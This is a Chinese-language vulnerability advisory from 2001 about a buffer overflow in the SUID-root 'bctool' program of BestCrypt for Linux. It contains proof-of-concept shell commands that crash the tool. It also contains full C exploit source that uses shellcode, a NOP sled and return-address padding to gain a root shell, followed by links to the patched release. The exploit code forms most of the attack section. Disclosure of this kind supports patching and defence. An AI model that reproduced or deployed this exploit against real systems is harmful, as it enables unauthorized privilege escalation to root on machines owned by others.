BestCrypt for Linux 存在缓冲溢出漏洞发布时间:2001-06-15 更新时间:2001-06-15 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 0.6-x -> 0.8-1详细描述 BestCrypt是维护和可加密文件系统的工具,不过其存在一个缓冲溢出, 可导致本地ROOT权利的获得。问题是'bctool'两进制程序默认情况下 是以SUID ROOT属性安装,其中'/src/bcmount.c'调用了'bcumount()', 其中'rp'的缓冲只定义了255字节大小,'rp'缓冲是用来存放文件 系统中的mount点,并通过'realpath(argv[1],rp)'来获得用户指定 路径并存储到'rp'中,这样可以在文件系统中建立超过255字节大小的 路径,造成缓冲溢出。 测试代码 foo:~ > mkdir /`perl -e 'print "a"x255'`/`perl -e 'print "a"x255'` foo:~ > bctool mount test.jbc /`perl -e 'print "a"x255'`/`perl -e 'print "a"x255'` Enter password: foo:~ > bctool umount /`perl -e 'print "a"x255'`/`perl -e 'print "a"x255'` Segmentation fault foo:~ > /* * Crippled version of the BestCrypt for Linux r00t exploit. * Note: this will not work out-of-the-box. You'll need to adjust it. * Script kiddies: don't even think about it. * * By Carl Livitt (carl@ititc.com) * * Usage example: foo:~ > id uid=500(carl) gid=100(users) groups=100(users) foo:~ > gcc -o bcexp bcexp.c foo:~ > ./bcexp foo:~ > bctool mount /path/to/container.jbc "$EGG" Enter password: foo:~ > bctool umount "$EGG" sh-2.04# id uid=0(root) gid=0(root) groups=0(root),1(bin),14(uucp),15(shadow) sh-2.04# * RET value will need tinkered with, also you'll find that you need to examine * the call history quite closely to make this work ;-) Have a look, you'll see * what I mean! * * You'll also notice there's a fair bit of redundant/messy/debug code in here... * This is intended to be an exploit, not an example of good coding. * */ #include <stdio.h> // Chopped up Aleph1 linux shellcode to work in a directory path. char shellcode[]="\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0" "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd" "\x80\xe8\xde\xff\xff\xff"; char shellpath[] = "/bin"; char shellprog[] = "/sh"; // not used any longer unsigned long sp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { char *p,*p2, path[4096], shell[4096], command[4096], old[4096]; int i,len, offs; unsigned long addr=0xbffff410; if(argc>1) { offs=atoi(argv[1]); } else { offs=0; } chdir("/tmp"); addr+=offs; printf("Using addr = 0x%08x\n", addr); // build a series of NOPs + shellcode and make directory p=path; for(i=0;i<162-strlen(shellcode);i++) *(p++)=(char)0x90; p2=shellcode; for(i=0;i<strlen(shellcode);i++) *(p++)=*(p2++); *p=0; strcpy(old, path); sprintf(command,"mkdir \"%s\"", path); system(command); // add the path to the shell to the shellcode-cum-path for(i=0;i<strlen(shellpath);i++) *(p++)=shellpath[i]; *p=0; sprintf(command,"mkdir \"%s\"", path); system(command); // add the name of the shell to the shellcode-cum-path for(i=0;i<strlen(shellprog);i++) *(p++)=shellprog[i]; *p=0; printf("strlen(path)=%d\n", strlen(path)); sprintf(command,"mkdir \"%s\"", path); system(command); // pad out the buffer with our RET address for(i=0;i<172;i++) { *(p++)=(char)(addr>>16)&0xff; *(p++)=(char)(addr>>24)&0xff; *(p++)=(char)addr&0xff; *(p++)=(char)(addr>>8)&0xff; } addr=(unsigned long)*(p-4); printf("ADDRESS: 0x%x\n", addr); *p=0; printf("strlen(path)=%d\n", strlen(path)); sprintf(command,"mkdir \"%s\"", path); system(command); // set environment variable and spawn a fresh shell setenv("EGG",path,1); system("/bin/bash"); } 解决方案 下载新的程序: Tarball: http://www.jetico.com/linux/BestCrypt-0.8-2.tar.gz Source RPM: http://www.jetico.com/linux/BestCrypt-0.8-2.src.rpm 相关信息 Work: carl@ititc.com Home: carllivitt@yahoo.com |
